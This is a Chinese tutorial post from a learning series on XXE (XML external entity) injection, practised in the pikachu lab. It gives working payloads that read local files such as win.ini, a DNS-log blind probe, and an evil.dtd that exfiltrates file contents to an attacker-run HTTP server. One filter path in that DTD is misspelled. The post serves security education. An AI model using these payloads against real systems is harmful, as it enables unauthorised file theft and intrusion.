★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、XXE漏洞原理
XXE全称:XML External Entity Injection,XML外部实体注入。XXE漏洞主要是由于危险的外部实体引用和未对外部实体进行敏感字符的过滤,从而造成命令执行、目录遍历等。攻击者通过构造恶意的外部实体,当解析器解析包含“恶意”外部实体的XML类型文件,就会导致XXE攻击。
摘自百度百科
XML全称:Extensible Markup Language,可扩展标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。
2、XXE的危害
1、导致可加载恶意外部文件、读取任意未授权文件,
2、恶意消耗内存进行DOS攻击,
3、探测内网信息,比如检测服务、内网端口扫描、攻击内网网站等,
4、命令执行、目录遍历等,
5、由于有些XML解析库支持列目录,攻击者通过列目录、读文件,获取账号密码后进一步攻击,比如读取tomcat-users.xml得到账号密码后登录tomcat的manager部署webshell。
3、XML分类
XXE的攻击方式分为两种:显示攻击和盲攻击。
**显示攻击: **攻击者可通过正常的回显将外部实体的内容读取出来;
盲攻击: 不显示外部实体的内容,可利用参数实体将本地文件内容读出来,作为URL参数向它指定服务器发起请求,然后在它指定服务器的日志中读取文件的内容。
4、pikachu靶场实验
4.0、环境准备
靶场环境搭建详参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》
4.1、普通实体
把这些xml代码放到文本框提交
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe "你今天真好看">
]>
<foo>&xxe;</foo>
提交结果
4.2、外部引用
把这些xml代码放到文本框提交
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/windows/win.ini">
]>
<foo>&xxe;</foo>
提交结果
4.3、盲注-利用dnslog
当没有回显提示信息时,可利用dnslog判断是否存在xxe漏洞。使用外部引用,在路径填写dnslog路径,然后在dnslog网站查看。
访问:https://dnslog.org/
,点击Get Sub Domain
按钮获取子域名放到xml代码
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://108c09f2.dnslog.store">
]>
<foo>&xxe;</foo>
提交后到https://dnslog.org/
,点击Get Results
查看注入结果,表示xxe注入成功
4.5、借助kali模拟攻击
4.5.0、前置说明
针对没有回显的,需要VPS(Virtual Private Server,虚拟专用服务器,简称VPS),这里使用kali模拟。
环境说明
攻击机kali(虚拟机):192.168.242.4
靶机win7(虚拟机):192.168.242.6
4.5.1 、kali开启http服务
使用python快速开启http服务,注入先使用sudo su
命令切换到管理员权限。
python3 -m http.server 80
4.5.2、kali创建evil.dtd
先在自己电脑本机创建evil.dtd,内容如下,
<!ENTITY % file SYSTEM "php://fiter/reader=convert.base64-encode/resource=file:///xxe.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.242.4?c=%file;'>">
创建一个文本xxe.txt,里面写123或自己任意写内容,和evil.dtd一起复制到kali的系统目录下:/home/kali
4.5.3、win7系统测试
可以直接在浏览器访问:http://192.168.242.4/evil.dtd
,会看到目录展示和下载evil.dtd。
pikachu使用下面的xml提交,
<!DOCTYPE convert[
<!ENTITY % remote SYSTEM "http://192.168.242.4/evil.dtd">
%remote;%int;%send;
]>
4.5.4、kali看数据读取成功
5、资料获取
如果需要kali和win7系统虚拟机,进行实验的话(如果在渗透测试实战已有下载过,不需要再下载了),请关注我的公众号:大象只为你,后台回复:虚拟机。文件有些大下载耗时会比较久。
6、下期内容预告
《跟我学网安知识》系列文章截止目前已分享49篇啦,也接近尾声了,还有内网一些知识,由于我还未整理成笔记,下周三要参加CISP考试和自己其他一些事情要忙,本周先暂时分享XXE这一篇。预计在下周六/日分享内网的知识点,内网部分可能大约2~3篇左右就结束了。
后面还会再分享技术文章,可能是Java专题系列,或自己挖漏洞的分享,来倒逼自己产出和学习,敬请关注我的公众号:大象只为你。